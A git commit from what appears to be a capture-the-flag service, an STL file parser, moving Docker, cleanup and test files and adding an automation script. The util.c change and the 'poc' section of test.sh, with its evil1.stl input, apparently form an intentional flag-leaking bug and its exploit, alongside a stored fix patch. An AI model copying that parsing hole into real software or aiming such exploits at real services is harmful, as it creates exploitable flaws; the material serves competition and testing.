From 16b3dff93e5d1096174749e1b809728f585d95fb Mon Sep 17 00:00:00 2001 From: Louis Burda Date: Wed, 19 May 2021 13:48:31 +0200 Subject: refactored service structure and added do.sh for automation --- service/.dockerignore | 1 + service/.gitignore | 1 + service/Dockerfile | 24 ------- service/cleaner.sh | 19 ------ service/container/.gitignore | 1 + service/container/Dockerfile | 24 +++++++ service/container/cleaner.sh | 19 ++++++ service/container/data/lastclean | 0 service/container/docker-compose.yml | 8 +++ service/container/entrypoint.sh | 14 +++++ service/do.sh | 46 ++++++++++++++ service/docker-compose.yml | 8 --- service/entrypoint.sh | 14 ----- service/patches/flagstore1.diff | 15 +++++ service/src/test.sh | 119 ----------------------------------- service/src/tests/evil1.stl | 9 --- service/src/tests/flag1.stl | 16 ----- service/src/tests/sample-ascii.stl | 16 ----- service/src/tests/sample-binary.stl | Bin 134 -> 0 bytes service/src/util.c | 3 +- service/tests/data/evil1.stl | 9 +++ service/tests/data/flag1.stl | 16 +++++ service/tests/data/sample-ascii.stl | 16 +++++ service/tests/data/sample-binary.stl | Bin 0 -> 134 bytes service/tests/test.sh | 119 +++++++++++++++++++++++++++++++++++ 25 files changed, 290 insertions(+), 227 deletions(-) create mode 100644 service/.dockerignore delete mode 100644 service/Dockerfile delete mode 100644 service/cleaner.sh create mode 100644 service/container/.gitignore create mode 100644 service/container/Dockerfile create mode 100644 service/container/cleaner.sh create mode 100644 service/container/data/lastclean create mode 100644 service/container/docker-compose.yml create mode 100755 service/container/entrypoint.sh create mode 100644 service/do.sh delete mode 100644 service/docker-compose.yml delete mode 100755 service/entrypoint.sh create mode 100644 service/patches/flagstore1.diff delete mode 100644 service/src/test.sh delete mode 100644 service/src/tests/evil1.stl delete mode 100644 service/src/tests/flag1.stl delete mode 100644 service/src/tests/sample-ascii.stl delete mode 100644 service/src/tests/sample-binary.stl create mode 100644 service/tests/data/evil1.stl create mode 100644 service/tests/data/flag1.stl create mode 100644 service/tests/data/sample-ascii.stl create mode 100644 service/tests/data/sample-binary.stl create mode 100644 service/tests/test.sh (limited to 'service') diff --git a/service/.dockerignore b/service/.dockerignore new file mode 100644 index 0000000..4baccb8 --- /dev/null +++ b/service/.dockerignore @@ -0,0 +1 @@ +patches diff --git a/service/.gitignore b/service/.gitignore index 2421b49..648ea81 100644 --- a/service/.gitignore +++ b/service/.gitignore @@ -1,2 +1,3 @@ data/* !data/.keep +.cleansrc diff --git a/service/Dockerfile b/service/Dockerfile deleted file mode 100644 index e987831..0000000 --- a/service/Dockerfile +++ /dev/null @@ -1,24 +0,0 @@ -FROM ubuntu:18.04 - -RUN apt update && apt install -y --no-install-recommends socat build-essential - -RUN addgroup --system service -RUN adduser --system --ingroup service --uid 1000 service - -RUN mkdir /data - -COPY entrypoint.sh / -RUN chmod +x /entrypoint.sh - -COPY cleaner.sh / -RUN chmod +x /cleaner.sh - -COPY src/ /service/ - -WORKDIR /service/ -RUN make clean && make - -EXPOSE 9000 -ENV RESULTDIR=/data/scans - -ENTRYPOINT ["/entrypoint.sh"] diff --git a/service/cleaner.sh b/service/cleaner.sh deleted file mode 100644 index 2882608..0000000 --- a/service/cleaner.sh +++ /dev/null @@ -1,19 +0,0 @@ -#!/bin/sh - -timeref="/data/lastclean" - -if [ -z "$RESULTDIR" ]; then - echo "RESULTDIR is undefined! skipping cleanup.." - exit 1 -fi - -if [ -f "$timeref" ]; then - files="$(find "$RESULTDIR" -mindepth 1 \! -newer "$timeref")" - echo "$files" | while read path; do - rm -rf "$path" - done - echo "[ $(date +%T) ] Removed $(echo -n "$files" | wc -l) old files!" -fi - -touch "$timeref" - diff --git a/service/container/.gitignore b/service/container/.gitignore new file mode 100644 index 0000000..8eba6c8 --- /dev/null +++ b/service/container/.gitignore @@ -0,0 +1 @@ +src/ diff --git a/service/container/Dockerfile b/service/container/Dockerfile new file mode 100644 index 0000000..e987831 --- /dev/null +++ b/service/container/Dockerfile @@ -0,0 +1,24 @@ +FROM ubuntu:18.04 + +RUN apt update && apt install -y --no-install-recommends socat build-essential + +RUN addgroup --system service +RUN adduser --system --ingroup service --uid 1000 service + +RUN mkdir /data + +COPY entrypoint.sh / +RUN chmod +x /entrypoint.sh + +COPY cleaner.sh / +RUN chmod +x /cleaner.sh + +COPY src/ /service/ + +WORKDIR /service/ +RUN make clean && make + +EXPOSE 9000 +ENV RESULTDIR=/data/scans + +ENTRYPOINT ["/entrypoint.sh"] diff --git a/service/container/cleaner.sh b/service/container/cleaner.sh new file mode 100644 index 0000000..2882608 --- /dev/null +++ b/service/container/cleaner.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +timeref="/data/lastclean" + +if [ -z "$RESULTDIR" ]; then + echo "RESULTDIR is undefined! skipping cleanup.." + exit 1 +fi + +if [ -f "$timeref" ]; then + files="$(find "$RESULTDIR" -mindepth 1 \! -newer "$timeref")" + echo "$files" | while read path; do + rm -rf "$path" + done + echo "[ $(date +%T) ] Removed $(echo -n "$files" | wc -l) old files!" +fi + +touch "$timeref" + diff --git a/service/container/data/lastclean b/service/container/data/lastclean new file mode 100644 index 0000000..e69de29 diff --git a/service/container/docker-compose.yml b/service/container/docker-compose.yml new file mode 100644 index 0000000..56ecc9f --- /dev/null +++ b/service/container/docker-compose.yml @@ -0,0 +1,8 @@ +version: '3' +services: + printdoc: + build: . + volumes: + - ./data/:/data:rw + ports: + - "9000:9000" diff --git a/service/container/entrypoint.sh b/service/container/entrypoint.sh new file mode 100755 index 0000000..956c747 --- /dev/null +++ b/service/container/entrypoint.sh @@ -0,0 +1,14 @@ +#!/bin/sh + +chown -R service:service "/data/" + +mkdir -p "$RESULTDIR" + +while [ 1 ]; do + /cleaner.sh + sleep 180 +done & + +servicecmd='socat -T30 -s TCP-LISTEN:9000,reuseaddr,fork EXEC:"/service/stldoctor",raw,pty,echo=0,stderr' + +su -s /bin/sh -c "$servicecmd" service diff --git a/service/do.sh b/service/do.sh new file mode 100644 index 0000000..2dfd82c --- /dev/null +++ b/service/do.sh @@ -0,0 +1,46 @@ +#!/bin/sh + +SCRIPTPATH="$(dirname $(readlink -f "$0"))" +cd "$SCRIPTPATH" + +makefile=" +all: .cleansrc + +.cleansrc: src/* + bash do.sh cleansrc src container/src + touch .cleansrc +" + +shopt -s expand_aliases +alias pushd="pushd &>/dev/null" +alias popd="popd &>/dev/null" + +if [ "$1" == "compose" ]; then + # ensure container files are up to date + make --file <(echo "$makefile") + + # forward commands to compose + pushd container + docker-compose ${@:2} + popd +elif [ "$1" == "cleansrc" ]; then + # copy files + src="$2" + dst="$3" + [ -e "$dst" ] && rm -rf "$dst" + cp -r "$src" "$dst" + + # strip comments + find "$dst" | while read path; do + if [ -f "$path" ]; then + sed -i -e 's/^\s*\/\*.*\*\/\s*$//g' "$path" # remove /* */ style comments + sed -i -e 's/\s*\/\*.*\*\/\s*/ /g' "$path" # remove /* */ style comments + sed -i -e 's/\/\/.*//g' "$path" # remove // style comments + sed -i -e ':a;N;$!ba;s/\n{2,}/\n/g' "$path" # collapse multiple newlines + fi + done +else + echo "USAGE: do.sh (compose) [args..]" + echo "EXAMPLES:" + echo " do.sh compose up --build # starts the docker container" +fi diff --git a/service/docker-compose.yml b/service/docker-compose.yml deleted file mode 100644 index 56ecc9f..0000000 --- a/service/docker-compose.yml +++ /dev/null @@ -1,8 +0,0 @@ -version: '3' -services: - printdoc: - build: . - volumes: - - ./data/:/data:rw - ports: - - "9000:9000" diff --git a/service/entrypoint.sh b/service/entrypoint.sh deleted file mode 100755 index 956c747..0000000 --- a/service/entrypoint.sh +++ /dev/null @@ -1,14 +0,0 @@ -#!/bin/sh - -chown -R service:service "/data/" - -mkdir -p "$RESULTDIR" - -while [ 1 ]; do - /cleaner.sh - sleep 180 -done & - -servicecmd='socat -T30 -s TCP-LISTEN:9000,reuseaddr,fork EXEC:"/service/stldoctor",raw,pty,echo=0,stderr' - -su -s /bin/sh -c "$servicecmd" service diff --git a/service/patches/flagstore1.diff b/service/patches/flagstore1.diff new file mode 100644 index 0000000..c307b3e --- /dev/null +++ b/service/patches/flagstore1.diff @@ -0,0 +1,15 @@ +diff --git a/service/src/util.c b/service/src/util.c +--- a/service/src/util.c ++++ b/service/src/util.c +@@ -75,10 +75,9 @@ void + freadstr(FILE *f, char **dst) + { + size_t start, len; +- char c; + + start = ftell(f); +- for (len = 0; (c = fgetc(f)) != EOF && c; len++); ++ for (len = 0; fgetc(f) > 0; len++); + fseek(f, start, SEEK_SET); + + *dst = checkp(calloc(1, len + 1)); diff --git a/service/src/test.sh b/service/src/test.sh deleted file mode 100644 index 69e3ea1..0000000 --- a/service/src/test.sh +++ /dev/null @@ -1,119 +0,0 @@ -#!/bin/sh - -set -e - -# RUNTYPE=1 - -SCRIPTPATH="$(dirname $(readlink -f "$0"))" -cd "$SCRIPTPATH" - -export RESULTDIR="../data/scans" -export ECHO_INPUT=1 - -announce() { - count=$(echo "$1" | wc -c) - python3 -c " -import math -s = '$1' -c = 80 -print() -print('#'*c) -print('#' + ' '*math.floor((c - len(s))/2-1) + s + ' '*math.ceil((c - len(s))/2-1) + '#') -print('#'*c) -print() - " -} - -checkleaks() { - valgrind --leak-check=full ./stldoctor 2>&1 | tee /tmp/testlog - if [ -z "$(grep "no leaks are possible" /tmp/testlog)" ]; then - echo "Valgrind exited with errors!" - exit 1 - fi -} - -connect() { - if [ "$RUNTYPE" == "remote" ]; then - nc localhost 9000 - elif [ "$RUNTYPE" == "debug" ]; then - checkleaks - else - ./stldoctor - fi -} - -if [ "$1" == "stl" ]; then - - announce "Testing ASCII STL Parsing" - ( - echo "echo" - echo "submit" - cat tests/sample-ascii.stl | wc -c - cat tests/sample-ascii.stl - echo "ASCII-testname" - ) | checkleaks - - announce "Testing BIN STL Parsing" - ( - echo "echo" - echo "submit" - cat tests/sample-binary.stl | wc -c - cat tests/sample-binary.stl - echo "BIN-testname" - ) | checkleaks - -elif [ "$1" == "poc" ]; then - - announce "Testing Proof-Of-Concept" - - [ ! -z "$RESULTDIR" ] && rm -rf "$RESULTDIR"/* - - echo -e "\n--- Uploading target STL ---\n" 1>&2 - ( - echo "echo" - echo "submit" - cat tests/flag1.stl | wc -c - cat tests/flag1.stl - echo "N0TaFL4G" - echo "exit" - ) | connect - - echo -e "\n--- Uploading evil STL ---\n" 1>&2 - ( - echo "echo" - echo "submit" - cat tests/evil1.stl | wc -c - cat tests/evil1.stl - echo "EV1L" - echo "exit" - ) | connect - - echo -e "\n--- Testing Exploit ---\n" 1>&2 - ( - echo "echo" - - # try index 0 - echo "query" - echo "EV1L" - echo "0" - echo "n" - - echo "query last" - echo "0" - echo "n" - - # try index 1 - echo "query" - echo -e "EV1L" - echo "0" - echo "n" - - echo "query last" - echo "1" - echo "n" - echo "exit" - ) | connect - -else - connect -fi diff --git a/service/src/tests/evil1.stl b/service/src/tests/evil1.stl deleted file mode 100644 index 706e9e2..0000000 --- a/service/src/tests/evil1.stl +++ /dev/null @@ -1,9 +0,0 @@ -solid test˙ -facet normal 0 0 1.0 - outer loop - vertex 1 0 0 - vertex 1 1 0 - vertex 0 1 0 - endloop - endfacet -endsolid diff --git a/service/src/tests/flag1.stl b/service/src/tests/flag1.stl deleted file mode 100644 index f2a3854..0000000 --- a/service/src/tests/flag1.stl +++ /dev/null @@ -1,16 +0,0 @@ -solid ENO{TESTFLAG} - facet normal 1.0 0 0 - outer loop - vertex 0 1 0 - vertex 0 1 1 - vertex 0 0 1 - endloop - endfacet - facet normal 0 0 1.0 - outer loop - vertex 1 0 0 - vertex 1 1 0 - vertex 0 1 0 - endloop - endfacet -endsolid diff --git a/service/src/tests/sample-ascii.stl b/service/src/tests/sample-ascii.stl deleted file mode 100644 index e3c89ef..0000000 --- a/service/src/tests/sample-ascii.stl +++ /dev/null @@ -1,16 +0,0 @@ -solid test - facet normal 1.0 0 0 - outer loop - vertex 0 1 0 - vertex 0 1 1 - vertex 0 0 1 - endloop - endfacet - facet normal 0 0 1.0 - outer loop - vertex 1 0 0 - vertex 1 1 0 - vertex 0 1 0 - endloop - endfacet -endsolid test diff --git a/service/src/tests/sample-binary.stl b/service/src/tests/sample-binary.stl deleted file mode 100644 index 13c02e4..0000000 Binary files a/service/src/tests/sample-binary.stl and /dev/null differ diff --git a/service/src/util.c b/service/src/util.c index c53f92b..bf6e872 100644 --- a/service/src/util.c +++ b/service/src/util.c @@ -75,10 +75,9 @@ void freadstr(FILE *f, char **dst) { size_t start, len; - char c; start = ftell(f); - for (len = 0; (c = fgetc(f)) != EOF && c; len++); + for (len = 0; fgetc(f) > 0; len++); fseek(f, start, SEEK_SET); *dst = checkp(calloc(1, len + 1)); diff --git a/service/tests/data/evil1.stl b/service/tests/data/evil1.stl new file mode 100644 index 0000000..706e9e2 --- /dev/null +++ b/service/tests/data/evil1.stl @@ -0,0 +1,9 @@ +solid test˙ +facet normal 0 0 1.0 + outer loop + vertex 1 0 0 + vertex 1 1 0 + vertex 0 1 0 + endloop + endfacet +endsolid diff --git a/service/tests/data/flag1.stl b/service/tests/data/flag1.stl new file mode 100644 index 0000000..f2a3854 --- /dev/null +++ b/service/tests/data/flag1.stl @@ -0,0 +1,16 @@ +solid ENO{TESTFLAG} + facet normal 1.0 0 0 + outer loop + vertex 0 1 0 + vertex 0 1 1 + vertex 0 0 1 + endloop + endfacet + facet normal 0 0 1.0 + outer loop + vertex 1 0 0 + vertex 1 1 0 + vertex 0 1 0 + endloop + endfacet +endsolid diff --git a/service/tests/data/sample-ascii.stl b/service/tests/data/sample-ascii.stl new file mode 100644 index 0000000..e3c89ef --- /dev/null +++ b/service/tests/data/sample-ascii.stl @@ -0,0 +1,16 @@ +solid test + facet normal 1.0 0 0 + outer loop + vertex 0 1 0 + vertex 0 1 1 + vertex 0 0 1 + endloop + endfacet + facet normal 0 0 1.0 + outer loop + vertex 1 0 0 + vertex 1 1 0 + vertex 0 1 0 + endloop + endfacet +endsolid test diff --git a/service/tests/data/sample-binary.stl b/service/tests/data/sample-binary.stl new file mode 100644 index 0000000..13c02e4 Binary files /dev/null and b/service/tests/data/sample-binary.stl differ diff --git a/service/tests/test.sh b/service/tests/test.sh new file mode 100644 index 0000000..69e3ea1 --- /dev/null +++ b/service/tests/test.sh @@ -0,0 +1,119 @@ +#!/bin/sh + +set -e + +# RUNTYPE=1 + +SCRIPTPATH="$(dirname $(readlink -f "$0"))" +cd "$SCRIPTPATH" + +export RESULTDIR="../data/scans" +export ECHO_INPUT=1 + +announce() { + count=$(echo "$1" | wc -c) + python3 -c " +import math +s = '$1' +c = 80 +print() +print('#'*c) +print('#' + ' '*math.floor((c - len(s))/2-1) + s + ' '*math.ceil((c - len(s))/2-1) + '#') +print('#'*c) +print() + " +} + +checkleaks() { + valgrind --leak-check=full ./stldoctor 2>&1 | tee /tmp/testlog + if [ -z "$(grep "no leaks are possible" /tmp/testlog)" ]; then + echo "Valgrind exited with errors!" + exit 1 + fi +} + +connect() { + if [ "$RUNTYPE" == "remote" ]; then + nc localhost 9000 + elif [ "$RUNTYPE" == "debug" ]; then + checkleaks + else + ./stldoctor + fi +} + +if [ "$1" == "stl" ]; then + + announce "Testing ASCII STL Parsing" + ( + echo "echo" + echo "submit" + cat tests/sample-ascii.stl | wc -c + cat tests/sample-ascii.stl + echo "ASCII-testname" + ) | checkleaks + + announce "Testing BIN STL Parsing" + ( + echo "echo" + echo "submit" + cat tests/sample-binary.stl | wc -c + cat tests/sample-binary.stl + echo "BIN-testname" + ) | checkleaks + +elif [ "$1" == "poc" ]; then + + announce "Testing Proof-Of-Concept" + + [ ! -z "$RESULTDIR" ] && rm -rf "$RESULTDIR"/* + + echo -e "\n--- Uploading target STL ---\n" 1>&2 + ( + echo "echo" + echo "submit" + cat tests/flag1.stl | wc -c + cat tests/flag1.stl + echo "N0TaFL4G" + echo "exit" + ) | connect + + echo -e "\n--- Uploading evil STL ---\n" 1>&2 + ( + echo "echo" + echo "submit" + cat tests/evil1.stl | wc -c + cat tests/evil1.stl + echo "EV1L" + echo "exit" + ) | connect + + echo -e "\n--- Testing Exploit ---\n" 1>&2 + ( + echo "echo" + + # try index 0 + echo "query" + echo "EV1L" + echo "0" + echo "n" + + echo "query last" + echo "0" + echo "n" + + # try index 1 + echo "query" + echo -e "EV1L" + echo "0" + echo "n" + + echo "query last" + echo "1" + echo "n" + echo "exit" + ) | connect + +else + connect +fi -- cgit v1.2.3-71-gd317